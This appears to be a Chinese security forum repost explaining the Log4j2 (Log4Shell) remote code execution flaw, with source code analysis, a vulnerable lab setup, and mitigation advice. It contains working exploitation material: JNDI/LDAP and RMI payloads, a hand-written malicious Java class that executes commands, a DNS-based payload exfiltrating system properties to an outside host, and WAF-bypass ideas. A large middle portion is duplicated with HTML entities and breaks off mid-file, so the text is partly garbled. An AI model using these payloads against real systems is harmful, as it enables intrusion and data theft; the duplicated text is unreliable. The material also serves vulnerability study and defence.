安全矩阵

 找回密码
 立即注册
搜索
查看: 2471|回复: 0

史上最全 log4j2 远程命令执行漏洞汇总报告

[复制链接]

855

主题

862

帖子

2940

积分

金牌会员

Rank: 6Rank: 6

积分
2940
发表于 2021-12-13 19:51:13 | 显示全部楼层 |阅读模式
原文链接:史上最全 log4j2 远程命令执行漏洞汇总报告

2021 年 11 月 24 日,阿里云安全团队向 Apache 官方报告了 Apache Log4j2 远程代码执行漏洞,在 12 月 9 日被国外有人公开 POC,从而导致了一波安全从业人员的疯狂运动,甲方安全从业者加班加点修复漏洞;白帽子们疯狂扫描漏洞并提交 SRC,一度导致一些 SRC 发布公告暂停接收相关漏洞;而黑灰产们已经在自己的挖矿勒索武器库上增加了该漏洞的利用模块。为什么会这么疯狂?
Apache Log4j2 是 Apache 的一个开源项目,Apache Log4j2 是一个基于 Java 的日志记录工具,使用非常广泛,被大量企业和系统索使用,漏洞触发及其简单,攻击者可直接构造恶意请求,触发远程代码执行漏洞。漏洞利用无需特殊配置
影响范围:Apache Log4j 2.x<=2.14.1
目前为止已知如下组件存在漏洞:
  1. Spring-Boot-strater-log4j2
  2. Apache Struts2
  3. Apache Solr
  4. Apache Flink
  5. Apache Druid
  6. ElasticSearch
  7. Flume
  8. Dubbo
  9. Redis
  10. Logstash
  11. Kafka
  12. vmvare
复制代码

从微信朋友圈的结果来看,此漏洞影响广泛,开源组件中有近两万项目使用该存在漏洞的模块,绝对是目前为止影响最为广泛的漏洞,堪比之前出现的 heartbleed(心脏滴血)漏洞。比如 vmvare 的公告:

至漏洞爆发开始,为了体现该漏洞的影响,甚至有了漏洞打地球的趣图,详情参考《核弹级漏洞公开,昨晚你睡着了么?》,除了文中的还有入侵汽车、借用 WIFI 名称钓鱼的,从线上到线下广泛应用:

看到这里,这个漏洞是不是很好玩儿?
漏洞是怎么回事?
关于漏洞原理可以参考文章 《Log4j2 研究之lookup》,强烈推荐 idea,ctrl 直接点进去看源码,下面是触发漏洞的关键代码:
1、org.apache.logging.log4j.core.pattern.MessagePatternConverter 的 format() 方法(表达式内容替换):
  1. public void format(final LogEvent event, final StringBuilder toAppendTo) {
  2.         Message msg = event.getMessage();
  3.         if (msg instanceof StringBuilderFormattable) {
  4.             boolean doRender = this.textRenderer != null;
  5.             StringBuilder workingBuilder = doRender ? new StringBuilder(80) : toAppendTo;
  6.             int offset = workingBuilder.length();
  7.             if (msg instanceof MultiFormatStringBuilderFormattable) {
  8.                 ((MultiFormatStringBuilderFormattable)msg).formatTo(this.formats, workingBuilder);
  9.             } else {
  10.                 ((StringBuilderFormattable)msg).formatTo(workingBuilder);
  11.             }
  12.             if (this.config != null && !this.noLookups) {
  13.                 for(int i = offset; i < workingBuilder.length() - 1; ++i) {
  14.                     if (workingBuilder.charAt(i) == '
  15. 代码的主要内容就是一旦发现日志中包含 ${ 就会将表达式的内容替换为表达式解析后的内容,而不是表达式本身,从而导致攻击者构造符合要求的表达式供系统执行。在 ${ 中可以使用的关键词如下:[code]${ctx:loginId}
  16. ${map:type}
  17. ${filename}
  18. ${date:MM-dd-yyyy}
  19. ${docker:containerId}
  20. ${docker:containerName}
  21. ${docker:imageName}
  22. ${env:USER}
  23. ${event:Marker}
  24. ${mdc:UserId}
  25. ${java:runtime}
  26. ${java:vm}
  27. ${java:os}
  28. ${jndi:logging/context-name}
  29. ${hostName}
  30. ${docker:containerId}
  31. ${k8s:accountName}
  32. ${k8s:clusterName}
  33. ${k8s:containerId}
  34. ${k8s:containerName}
  35. ${k8s:host}
  36. ${k8s:labels.app}
  37. ${k8s:labels.podTemplateHash}
  38. ${k8s:masterUrl}
  39. ${k8s:namespaceId}
  40. ${k8s:namespaceName}
  41. ${k8s:podId}
  42. ${k8s:podIp}
  43. ${k8s:podName}
  44. ${k8s:imageId}
  45. ${k8s:imageName}
  46. ${log4j:configLocation}
  47. ${log4j:configParentLocation}
  48. ${spring:spring.application.name}
  49. ${main:myString}
  50. ${main:0}
  51. ${main:1}
  52. ${main:2}
  53. ${main:3}
  54. ${main:4}
  55. ${main:bar}
  56. ${name}
  57. ${marker}
  58. ${marker:name}
  59. ${spring:profiles.active[0]
  60. ${sys:logPath}
  61. ${web:rootDir}
复制代码

来源:
https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
2、org.apache.logging.log4j.core.lookup.StrSubstitutor(提取字符串,并通过 lookup 进行内容替换)
  1. private int substitute(final LogEvent event, final StringBuilder buf, final int offset, final int length, List<String> priorVariables) {
  2.         StrMatcher prefixMatcher = this.getVariablePrefixMatcher();
  3.         StrMatcher suffixMatcher = this.getVariableSuffixMatcher();
  4.         char escape = this.getEscapeChar();
  5.         StrMatcher valueDelimiterMatcher = this.getValueDelimiterMatcher();
  6.         boolean substitutionInVariablesEnabled = this.isEnableSubstitutionInVariables();
  7.         boolean top = priorVariables == null;
  8.         boolean altered = false;
  9.         int lengthChange = 0;
  10.         char[] chars = this.getChars(buf);
  11.         int bufEnd = offset + length;
  12.         int pos = offset;
  13.         while(true) {
  14.             label117:
  15.             while(pos < bufEnd) {
  16.                 int startMatchLen = prefixMatcher.isMatch(chars, pos, offset, bufEnd);
  17.                 if (startMatchLen == 0) {
  18.                     ++pos;
  19.                 } else if (pos > offset && chars[pos - 1] == escape) {
  20.                     buf.deleteCharAt(pos - 1);
  21.                     chars = this.getChars(buf);
  22.                     --lengthChange;
  23.                     altered = true;
  24.                     --bufEnd;
  25.                 } else {
  26.                     int startPos = pos;
  27.                     pos += startMatchLen;
  28.                     int endMatchLen = false;
  29.                     int nestedVarCount = 0;
  30.                     while(true) {
  31.                         while(true) {
  32.                             if (pos >= bufEnd) {
  33.                                 continue label117;
  34.                             }
  35.                             int endMatchLen;
  36.                             if (substitutionInVariablesEnabled && (endMatchLen = prefixMatcher.isMatch(chars, pos, offset, bufEnd)) != 0) {
  37.                                 ++nestedVarCount;
  38.                                 pos += endMatchLen;
  39.                             } else {
  40.                                 endMatchLen = suffixMatcher.isMatch(chars, pos, offset, bufEnd);
  41.                                 if (endMatchLen == 0) {
  42.                                     ++pos;
  43.                                 } else {
  44.                                     if (nestedVarCount == 0) {
  45.                                         String varNameExpr = new String(chars, startPos + startMatchLen, pos - startPos - startMatchLen);
  46.                                         if (substitutionInVariablesEnabled) {
  47.                                             StringBuilder bufName = new StringBuilder(varNameExpr);
  48.                                             this.substitute(event, bufName, 0, bufName.length());
  49.                                             varNameExpr = bufName.toString();
  50.                                         }
  51.                                         pos += endMatchLen;
  52.                                         String varName = varNameExpr;
  53.                                         String varDefaultValue = null;
  54.                                         int i;
  55.                                         int valueDelimiterMatchLen;
  56.                                         if (valueDelimiterMatcher != null) {
  57.                                             char[] varNameExprChars = varNameExpr.toCharArray();
  58.                                             int valueDelimiterMatchLen = false;
  59.                                             label100:
  60.                                             for(i = 0; i < varNameExprChars.length && (substitutionInVariablesEnabled || prefixMatcher.isMatch(varNameExprChars, i, i, varNameExprChars.length) == 0); ++i) {
  61.                                                 if (this.valueEscapeDelimiterMatcher != null) {
  62.                                                     int matchLen = this.valueEscapeDelimiterMatcher.isMatch(varNameExprChars, i);
  63.                                                     if (matchLen != 0) {
  64.                                                         String varNamePrefix = varNameExpr.substring(0, i) + ':';
  65.                                                         varName = varNamePrefix + varNameExpr.substring(i + matchLen - 1);
  66.                                                         int j = i + matchLen;
  67.                                                         while(true) {
  68.                                                             if (j >= varNameExprChars.length) {
  69.                                                                 break label100;
  70.                                                             }
  71.                                                             if ((valueDelimiterMatchLen = valueDelimiterMatcher.isMatch(varNameExprChars, j)) != 0) {
  72.                                                                 varName = varNamePrefix + varNameExpr.substring(i + matchLen, j);
  73.                                                                 varDefaultValue = varNameExpr.substring(j + valueDelimiterMatchLen);
  74.                                                                 break label100;
  75.                                                             }
  76.                                                             ++j;
  77.                                                         }
  78.                                                     }
  79.                                                     if ((valueDelimiterMatchLen = valueDelimiterMatcher.isMatch(varNameExprChars, i)) != 0) {
  80.                                                         varName = varNameExpr.substring(0, i);
  81.                                                         varDefaultValue = varNameExpr.substring(i + valueDelimiterMatchLen);
  82.                                                         break;
  83.                                                     }
  84.                                                 } else if ((valueDelimiterMatchLen = valueDelimiterMatcher.isMatch(varNameExprChars, i)) != 0) {
  85.                                                     varName = varNameExpr.substring(0, i);
  86.                                                     varDefaultValue = varNameExpr.substring(i + valueDelimiterMatchLen);
  87.                                                     break;
  88.                                                 }
  89.                                             }
  90.                                         }
  91.                                         if (priorVariables == null) {
  92.                                             priorVariables = new ArrayList();
  93.                                             ((List)priorVariables).add(new String(chars, offset, length + lengthChange));
  94.                                         }
  95.                                         this.checkCyclicSubstitution(varName, (List)priorVariables);
  96.                                         ((List)priorVariables).add(varName);
  97.                                         String varValue = this.resolveVariable(event, varName, buf, startPos, pos);
  98.                                         if (varValue == null) {
  99.                                             varValue = varDefaultValue;
  100.                                         }
  101.                                         if (varValue != null) {
  102.                                             valueDelimiterMatchLen = varValue.length();
  103.                                             buf.replace(startPos, pos, varValue);
  104.                                             altered = true;
  105.                                             i = this.substitute(event, buf, startPos, valueDelimiterMatchLen, (List)priorVariables);
  106.                                             i += valueDelimiterMatchLen - (pos - startPos);
  107.                                             pos += i;
  108.                                             bufEnd += i;
  109.                                             lengthChange += i;
  110.                                             chars = this.getChars(buf);
  111.                                         }
  112.                                         ((List)priorVariables).remove(((List)priorVariables).size() - 1);
  113.                                         continue label117;
  114.                                     }
  115.                                     --nestedVarCount;
  116.                                     pos += endMatchLen;
  117.                                 }
  118.                             }
  119.                         }
  120.                     }
  121.                 }
  122.             }
  123.             if (top) {
  124.                 return altered ? 1 : 0;
  125.             }
  126.             return lengthChange;
  127.         }
  128.     }
复制代码

总结一下日志在打印时当遇到 ${ 后,Interpolator 类以 : 号作为分割,将表达式内容分割成两部分,前面部分作为 prefix,后面部分作为 key。然后通过 prefix 去找对应的 lookup,通过对应的 lookup 实例调用 lookup 方法,最后将 key 作为参数带入执行。
知道原理如何构造 Payload 利用
log4j2 支持很多协议,例如通过 ldap 查找变量,通过 docker 查找变量,详细参考这里:
https://www.docs4dev.com/docs/zh/log4j2/2.x/all/manual-lookups.html
从网上大家的测试来看,主要使用 ldap 来构造 payload:

${jndi:ldap://xxx.xxx.xxx.xxx/exp}
最终效果就是通过 jndi 注入,借助 ldap 服务来下载执行恶意 payload,从而执行命令,整个利用流程如图:

整个利用流程分两步:
第一步:向目标发送指定 payload,目标对 payload 进行解析执行,然后会通过 ldap 链接远程服务,当 ldap 服务收到请求之后,将请求进行重定向到恶意 java class 的地址。
第二步:目标服务器收到重定向请求之后,下载恶意 class 并执行其中的代码,从而执行系统命令。
​​
靶场搭建
在进行漏洞测试之前,首先部署一个漏洞靶场供测试之用。
1、maven pom.xml: 导入 log4j-core 和 log4j-api 既可(2.14.1 及其以下)
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <project xmlns="http://maven.apache.org/POM/4.0.0"
  3.          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  4.          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
  5.     <modelVersion>4.0.0</modelVersion>
  6.     <groupId>org.example</groupId>
  7.     <artifactId>log4j-rce</artifactId>
  8.     <version>1.0-SNAPSHOT</version>
  9.     <dependencies>
  10.         <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core -->
  11.         <dependency>
  12.             <groupId>org.apache.logging.log4j</groupId>
  13.             <artifactId>log4j-core</artifactId>
  14.             <version>2.14.1</version>
  15.         </dependency>
  16.         <!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api -->
  17.         <dependency>
  18.             <groupId>org.apache.logging.log4j</groupId>
  19.             <artifactId>log4j-api</artifactId>
  20.             <version>2.14.1</version>
  21.         </dependency>
  22.     </dependencies>
  23. </project>
复制代码

2、main 入口类
  1. import org.apache.logging.log4j.LogManager;
  2. import org.apache.logging.log4j.Logger;
  3. public class log4j {
  4.     private static final Logger logger = LogManager.getLogger(log4j.class);
  5.     public static void main(String[] args) {
  6.         logger.error("${jndi:ldap://127.0.0.1:1389/tsslma}");
  7. }
  8. }
复制代码

多种方法漏洞利用方法一:利用 JNDI 注入器
1、github 下载 jndi 注入器(下载 jar 包即可)
https://github.com/welk1n/JNDI-Injection-Exploit/releases
2、运行 jar 包,开启服务

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "C:\Windows\WinSxS\wow64_microsoft-windows-calc_31bf3856ad364e35_10.0.19041.1_none_6a03b910ee7a4073\calc.exe" -A "127.0.0.1"
参数说明
  •         -c :远程 class 文件中要执行的命令。
  •         -A :服务器地址,可以是 ip 或者域名

注意事项
  •         要确保 1099,1389,8180 端口可用,或下载源码在 run.ServerStart 类 26~28 行更改默认端口,再打包成 jar 包运行
  •         命令会作为参数传入 Runtime.getRuntime().exec(),所以需要确保命令传入 exec() 方法可执行。
  •         bash 等可在 shell 直接执行的相关命令需要加双引号,比如说 java -jar JNDI.jar -C "bash -c ..."

3、根据 cmd 日志拼接 log4j2 打印的日志

由控制台打印的日志可知,jdk1.8 ldap 协议的临时生成的类为 kk1i3g,log4j 日志打印

${jndi:ldap://127.0.0.1:1389/kk1i3g}
4、运行 main 入口类,打印 log4j2 日志,弹出计算器

方法二:根据 jndi 注入原理自己编写
1、在 java 下新建 exp 包
2、在 exp 下新建需要被注入的类
  1. package exp;
  2. import javax.lang.model.element.Name;
  3. import javax.naming.Context;
  4. import java.io.BufferedInputStream;
  5. import java.io.BufferedReader;
  6. import java.io.IOException;
  7. import java.io.InputStreamReader;
  8. import java.util.HashMap;
  9. public class EvilObj {
  10.     public static void exec(String cmd) throws IOException {
  11.         String sb = "";
  12.         BufferedInputStream bufferedInputStream = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());
  13.         BufferedReader inBr = new BufferedReader(new InputStreamReader(bufferedInputStream));
  14.         String lineStr;
  15.         while((lineStr = inBr.readLine()) != null){
  16.             sb += lineStr+"\n";
  17.         }
  18.         inBr.close();
  19.         inBr.close();
  20.     }
  21.     public Object getObjectInstance(Object obj, Name name, Context context, HashMap<?, ?> environment) throws Exception{
  22.         return null;
  23.     }
  24.     static {
  25.         try{
  26.             //需要执行的命令
  27.             exec("C:\\Windows\\WinSxS\\wow64_microsoft-windows-calc_31bf3856ad364e35_10.0.19041.1_none_6a03b910ee7a4073\\calc.exe");
  28.         }catch (Exception e){
  29.             e.printStackTrace();
  30.         }
  31.     }
  32. }
复制代码

3、创建服务类
  1. package exp;
  2. import com.sun.jndi.rmi.registry.ReferenceWrapper;
  3. import javax.naming.NamingException;
  4. import javax.naming.Reference;
  5. import java.rmi.AlreadyBoundException;
  6. import java.rmi.RemoteException;
  7. import java.rmi.registry.LocateRegistry;
  8. import java.rmi.registry.Registry;
  9. public class Server {
  10.     public static void main(String[] args) throws RemoteException, NamingException, AlreadyBoundException {
  11.         Registry registry = LocateRegistry.createRegistry(1099);
  12. //        String url = "http://110.40.250.105/jndiRemote/";
  13.         String url = "http://127.0.0.1:6666/";
  14.         System.out.println("Create RMI registry on port 1099");
  15.         Reference reference = new Reference("exp.EvilObj", "exp.EvilObj", url);
  16.         ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);
  17.         registry.bind("evil", referenceWrapper);
  18.     }
  19. }
复制代码

加了两个文件的目录结构为:
4、在编译好的 EvilObj 目录下 cmd,执行 python -m http.server 6666 打开 http 服务(在本地其实不打开也访问的到)

5、log4j 的 main 方法打印
logger.error("${jndi:rmi://localhost:1099/evil}");
6、启动 Server,启动 log4j,弹出计算器

方法三:利用 dnslog 检测并外带数据
1、访问 https://log.xn--9tr.com/,点击 Get SubDomain 获取域名(当然也可以选择其他平台,比如 dnslog、ceye 等):

2、拼接日志(将域名加进日志里面)
  1. import org.apache.logging.log4j.LogManager;
  2. import org.apache.logging.log4j.Logger;
  3. public class log4j {
  4.     private static final Logger logger = LogManager.getLogger(log4j.class);
  5.     public static void main(String[] args) {
  6.         logger.error("${jndi:ldap://08dc16c2.dns.1433.eu.org./exp}");
  7. }
  8. }
复制代码

3、直接运行步骤 2 的类,浏览器点击 Refresh Record,在浏览器看到回显
4、外带数据的 payload:

${jndi:ldap://${sys:java.version}.collaborator.com}
可以获取的数据如图:

总结:学习推荐自己实现,不要太依耐工具,实际测试为了效率可以使用工具
对于黑盒测试而言如何发现漏洞
大家都知道存在漏洞是因为在打日志的时候存在问题,所以对于黑盒测试而言,只要是能够被服务端获取且被记录的地方都是可以触发漏洞的,比如 header 中的 Cookie、User-agent 等,post 或者 get 的参数中,url 中等,这种只能盲打,根据返回结果来判断。
检测漏洞项目参考:
https://github.com/takito1812/log4j-detect/blob/main/log4j-detect.py

主要在 header 和 参数中增加 payload 进行漏洞触发,可以结合 dnslog 平台实现自动化漏洞发现,攻击图如下:

对于白盒来说如何发现存在漏洞的系统
白盒相对容易一些,毕竟代码在手,还有什么不知道的,只需要搜索 git 平台的代码,如果符合漏洞版本范围内的都是存在问题的,全部升级替换即可。
下面是火线安全统计的关于存在漏洞组件的库,可以进行搜索,网站:
https://log4j2.huoxian.cn/layout

就是企业越大,系统越多,更新的过程越复杂,需要测试调试的时间越多,尽量避免因为修复漏洞而导致系统故障。
对于该漏洞的临时防护怎么做
如果企业已经部署了 WAF 等安全产品,在漏洞爆发之初就应该及时更新规则,临时处置,从而给后续的根治争取时间,从 payload 上看,有几个关键特征{,jndi,ldap,rmi等,但是如果只是拦截 jndi 等字符串,很可能没有很好的效果,因为可以进行字符串拼接从而绕过检测,而如果拦截 ${,又可能造成正常功能无法使用,毕竟可能存在正常请求中包含这个关键词的情况。
所以在上临时规则时,要先灰度测试一段时间,才可以全量上规则,否则因为一时的防御,而导致新的问题。下面是一个关于 waf 绕过思路,也可以作为防御的参考:
1、jndi、ldap、rmi 绕过
  •         用 lowerCase upperCase 把关键词分割开
  •         如果使用了正则的话可以使用 upper 把 jndı 转成 jndi

案例:

2、${ 关键词拦截(范围大且容易产生误报,且不能真正解决,漏洞的触发点是在打印日志的时候把可控内容携带进去了)
3、为了减少误报,waf 匹配规则参考:

\${(\${(.*?:|.*?:.*?:-)('|"|`)*( ?1)}*|[jndildap|rm)]('|"|`)*}*){9,10}
效果如图:

临时方案治标不治本,只能争取时间,从根源上测地消灭漏洞。
在野利用的案例
随着漏洞的公开,在野利用该漏洞获取权限并进行挖矿勒索的案例已然出现,比如奇安信检测到的情况,详情《警惕!Log4j2漏洞已被多个僵尸网络家族利用》,漏洞触发条件是在 url 中带入 payload:

漏洞利用成功后会加入 SSH 公钥,这个特征还比较明显,容易拦截。比如绿盟科技检测到的情况,详情《Log4j2修补时间差!挖矿软件和僵尸网络乘虚而入》,payload 及利用如图:

我相信,在野利用绝非检测到的这些方式,还有更多想不到的利用方式,这个也会长期存在。
如何修复这个漏洞
漏洞出现之后,官方也一直在推出补丁,然而一直也存在补丁绕过的情况 ,打官方补丁当然是一个比较靠谱的方式,但是一开始并不能完美解决。
在进行漏洞利用时,针对高版本的 java jdk 是无法直接利用的,但是也不一定完全不可以,对于一些企业,定期更新 java 的可能影响比较小,所以 java 版本更新也是一种缓解的方式。
其他层面的修复:
1、采用 rasp 对lookup的调用进行阻断
2、限制不必要的业务访问外网
3、设置 JVM 启动参数 - Dlog4j2.formatMsgNoLookups=true
4、WAF 添加漏洞攻击代码临时拦截规则创建“log4j2.component.properties”文件,文件中增加配置“log4j2.formatMsgNoLookups=true”
写后感
没想到我会因为一句 logger.error 写这么多,其实如果是其它级别的日志只要能打印应该也是可以利用,至于什么级别的打印其实是可以自己配置的,我的第一个 1day 就这样总结完了,感谢良哥,分享了一下 log4j 漏洞成因,说实话那时候看的是有点蒙,点进去像套娃一样。


&& workingBuilder.charAt(i + 1) == '{') {
                        String value = workingBuilder.substring(offset, workingBuilder.length());
                        workingBuilder.setLength(offset);
                        workingBuilder.append(this.config.getStrSubstitutor().replace(event, value));
                    }
                }
            }
            if (doRender) {
                this.textRenderer.render(workingBuilder, toAppendTo);
            }
        } else {
            if (msg != null) {
                String result;
                if (msg instanceof MultiformatMessage) {
                    result = ((MultiformatMessage)msg).getFormattedMessage(this.formats);
                } else {
                    result = msg.getFormattedMessage();
                }
                if (result != null) {
                    toAppendTo.append(this.config != null && result.contains("${") ? this.config.getStrSubstitutor().replace(event, result) : result);
                } else {
                    toAppendTo.append("null");
                }
            }
        }
    }
}[/code]
代码的主要内容就是一旦发现日志中包含 ${ 就会将表达式的内容替换为表达式解析后的内容,而不是表达式本身,从而导致攻击者构造符合要求的表达式供系统执行。在 ${ 中可以使用的关键词如下:
  1. ${ctx:loginId}
  2. ${map:type}
  3. ${filename}
  4. ${date:MM-dd-yyyy}
  5. ${docker:containerId}
  6. ${docker:containerName}
  7. ${docker:imageName}
  8. ${env:USER}
  9. ${event:Marker}
  10. ${mdc:UserId}
  11. ${java:runtime}
  12. ${java:vm}
  13. ${java:os}
  14. ${jndi:logging/context-name}
  15. ${hostName}
  16. ${docker:containerId}
  17. ${k8s:accountName}
  18. ${k8s:clusterName}
  19. ${k8s:containerId}
  20. ${k8s:containerName}
  21. ${k8s:host}
  22. ${k8s:labels.app}
  23. ${k8s:labels.podTemplateHash}
  24. ${k8s:masterUrl}
  25. ${k8s:namespaceId}
  26. ${k8s:namespaceName}
  27. ${k8s:podId}
  28. ${k8s:podIp}
  29. ${k8s:podName}
  30. ${k8s:imageId}
  31. ${k8s:imageName}
  32. ${log4j:configLocation}
  33. ${log4j:configParentLocation}
  34. ${spring:spring.application.name}
  35. ${main:myString}
  36. ${main:0}
  37. ${main:1}
  38. ${main:2}
  39. ${main:3}
  40. ${main:4}
  41. ${main:bar}
  42. ${name}
  43. ${marker}
  44. ${marker:name}
  45. ${spring:profiles.active[0]
  46. ${sys:logPath}
  47. ${web:rootDir}
复制代码

来源:
https://gist.github.com/bugbountynights/dde69038573db1c12705edb39f9a704a
2、org.apache.logging.log4j.core.lookup.StrSubstitutor(提取字符串,并通过 lookup 进行内容替换)
  1. private int substitute(final LogEvent event, final StringBuilder buf, final int offset, final int length, List&lt;String&gt; priorVariables) {
  2.         StrMatcher prefixMatcher = this.getVariablePrefixMatcher();
  3.         StrMatcher suffixMatcher = this.getVariableSuffixMatcher();
  4.         char escape = this.getEscapeChar();
  5.         StrMatcher valueDelimiterMatcher = this.getValueDelimiterMatcher();
  6.         boolean substitutionInVariablesEnabled = this.isEnableSubstitutionInVariables();
  7.         boolean top = priorVariables == null;
  8.         boolean altered = false;
  9.         int lengthChange = 0;
  10.         char[] chars = this.getChars(buf);
  11.         int bufEnd = offset + length;
  12.         int pos = offset;
  13.         while(true) {
  14.             label117:
  15.             while(pos &lt; bufEnd) {
  16.                 int startMatchLen = prefixMatcher.isMatch(chars, pos, offset, bufEnd);
  17.                 if (startMatchLen == 0) {
  18.                     ++pos;
  19.                 } else if (pos &gt; offset &amp;&amp; chars[pos - 1] == escape) {
  20.                     buf.deleteCharAt(pos - 1);
  21.                     chars = this.getChars(buf);
  22.                     --lengthChange;
  23.                     altered = true;
  24.                     --bufEnd;
  25.                 } else {
  26.                     int startPos = pos;
  27.                     pos += startMatchLen;
  28.                     int endMatchLen = false;
  29.                     int nestedVarCount = 0;
  30.                     while(true) {
  31.                         while(true) {
  32.                             if (pos &gt;= bufEnd) {
  33.                                 continue label117;
  34.                             }
  35.                             int endMatchLen;
  36.                             if (substitutionInVariablesEnabled &amp;&amp; (endMatchLen = prefixMatcher.isMatch(chars, pos, offset, bufEnd)) != 0) {
  37.                                 ++nestedVarCount;
  38.                                 pos += endMatchLen;
  39.                             } else {
  40.                                 endMatchLen = suffixMatcher.isMatch(chars, pos, offset, bufEnd);
  41.                                 if (endMatchLen == 0) {
  42.                                     ++pos;
  43.                                 } else {
  44.                                     if (nestedVarCount == 0) {
  45.                                         String varNameExpr = new String(chars, startPos + startMatchLen, pos - startPos - startMatchLen);
  46.                                         if (substitutionInVariablesEnabled) {
  47.                                             StringBuilder bufName = new StringBuilder(varNameExpr);
  48.                                             this.substitute(event, bufName, 0, bufName.length());
  49.                                             varNameExpr = bufName.toString();
  50.                                         }
  51.                                         pos += endMatchLen;
  52.                                         String varName = varNameExpr;
  53.                                         String varDefaultValue = null;
  54.                                         int i;
  55.                                         int valueDelimiterMatchLen;
  56.                                         if (valueDelimiterMatcher != null) {
  57.                                             char[] varNameExprChars = varNameExpr.toCharArray();
  58.                                             int valueDelimiterMatchLen = false;
  59.                                             label100:
  60.                                             for(i = 0; i &lt; varNameExprChars.length &amp;&amp; (substitutionInVariablesEnabled || prefixMatcher.isMatch(varNameExprChars, i, i, varNameExprChars.length) == 0); ++i) {
  61.                                                 if (this.valueEscapeDelimiterMatcher != null) {
  62.                                                     int matchLen = this.valueEscapeDelimiterMatcher.isMatch(varNameExprChars, i);
  63.                                                     if (matchLen != 0) {
  64.                                                         String varNamePrefix = varNameExpr.substring(0, i) + ':';
  65.                                                         varName = varNamePrefix + varNameExpr.substring(i + matchLen - 1);
  66.                                                         int j = i + matchLen;
  67.                                                         while(true) {
  68.                                                             if (j &gt;= varNameExprChars.length) {
  69.                                                                 break label100;
  70.                                                             }
  71.                                                             if ((valueDelimiterMatchLen = valueDelimiterMatcher.isMatch(varNameExprChars, j)) != 0) {
  72.                                                                 varName = varNamePrefix + varNameExpr.substring(i + matchLen, j);
  73.                                                                 varDefaultValue = varNameExpr.substring(j + valueDelimiterMatchLen);
  74.                                                                 break label100;
  75.                                                             }
  76.                                                             ++j;
  77.                                                         }
  78.                                                     }
  79.                                                     if ((valueDelimiterMatchLen = valueDelimiterMatcher.isMatch(varNameExprChars, i)) != 0) {
  80.                                                         varName = varNameExpr.substring(0, i);
  81.                                                         varDefaultValue = varNameExpr.substring(i + valueDelimiterMatchLen);
  82.                                                         break;
  83.                                                     }
  84.                                                 } else if ((valueDelimiterMatchLen = valueDelimiterMatcher.isMatch(varNameExprChars, i)) != 0) {
  85.                                                     varName = varNameExpr.substring(0, i);
  86.                                                     varDefaultValue = varNameExpr.substring(i + valueDelimiterMatchLen);
  87.                                                     break;
  88.                                                 }
  89.                                             }
  90.                                         }
  91.                                         if (priorVariables == null) {
  92.                                             priorVariables = new ArrayList();
  93.                                             ((List)priorVariables).add(new String(chars, offset, length + lengthChange));
  94.                                         }
  95.                                         this.checkCyclicSubstitution(varName, (List)priorVariables);
  96.                                         ((List)priorVariables).add(varName);
  97.                                         String varValue = this.resolveVariable(event, varName, buf, startPos, pos);
  98.                                         if (varValue == null) {
  99.                                             varValue = varDefaultValue;
  100.                                         }
  101.                                         if (varValue != null) {
  102.                                             valueDelimiterMatchLen = varValue.length();
  103.                                             buf.replace(startPos, pos, varValue);
  104.                                             altered = true;
  105.                                             i = this.substitute(event, buf, startPos, valueDelimiterMatchLen, (List)priorVariables);
  106.                                             i += valueDelimiterMatchLen - (pos - startPos);
  107.                                             pos += i;
  108.                                             bufEnd += i;
  109.                                             lengthChange += i;
  110.                                             chars = this.getChars(buf);
  111.                                         }
  112.                                         ((List)priorVariables).remove(((List)priorVariables).size() - 1);
  113.                                         continue label117;
  114.                                     }
  115.                                     --nestedVarCount;
  116.                                     pos += endMatchLen;
  117.                                 }
  118.                             }
  119.                         }
  120.                     }
  121.                 }
  122.             }
  123.             if (top) {
  124.                 return altered ? 1 : 0;
  125.             }
  126.             return lengthChange;
  127.         }
  128.     }
复制代码

总结一下日志在打印时当遇到 ${ 后,Interpolator 类以 : 号作为分割,将表达式内容分割成两部分,前面部分作为 prefix,后面部分作为 key。然后通过 prefix 去找对应的 lookup,通过对应的 lookup 实例调用 lookup 方法,最后将 key 作为参数带入执行。
知道原理如何构造 Payload 利用
log4j2 支持很多协议,例如通过 ldap 查找变量,通过 docker 查找变量,详细参考这里:
https://www.docs4dev.com/docs/zh/log4j2/2.x/all/manual-lookups.html
从网上大家的测试来看,主要使用 ldap 来构造 payload:

${jndi:ldap://xxx.xxx.xxx.xxx/exp}
最终效果就是通过 jndi 注入,借助 ldap 服务来下载执行恶意 payload,从而执行命令,整个利用流程如图:

整个利用流程分两步:
第一步:向目标发送指定 payload,目标对 payload 进行解析执行,然后会通过 ldap 链接远程服务,当 ldap 服务收到请求之后,将请求进行重定向到恶意 java class 的地址。
第二步:目标服务器收到重定向请求之后,下载恶意 class 并执行其中的代码,从而执行系统命令。
​​
靶场搭建
在进行漏洞测试之前,首先部署一个漏洞靶场供测试之用。
1、maven pom.xml: 导入 log4j-core 和 log4j-api 既可(2.14.1 及其以下)
  1. &lt;?xml version="1.0" encoding="UTF-8"?&gt;
  2. &lt;project xmlns="http://maven.apache.org/POM/4.0.0"
  3.          xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
  4.          xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd"&gt;
  5.     &lt;modelVersion&gt;4.0.0&lt;/modelVersion&gt;
  6.     &lt;groupId&gt;org.example&lt;/groupId&gt;
  7.     &lt;artifactId&gt;log4j-rce&lt;/artifactId&gt;
  8.     &lt;version&gt;1.0-SNAPSHOT&lt;/version&gt;
  9.     &lt;dependencies&gt;
  10.         &lt;!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-core --&gt;
  11.         &lt;dependency&gt;
  12.             &lt;groupId&gt;org.apache.logging.log4j&lt;/groupId&gt;
  13.             &lt;artifactId&gt;log4j-core&lt;/artifactId&gt;
  14.             &lt;version&gt;2.14.1&lt;/version&gt;
  15.         &lt;/dependency&gt;
  16.         &lt;!-- https://mvnrepository.com/artifact/org.apache.logging.log4j/log4j-api --&gt;
  17.         &lt;dependency&gt;
  18.             &lt;groupId&gt;org.apache.logging.log4j&lt;/groupId&gt;
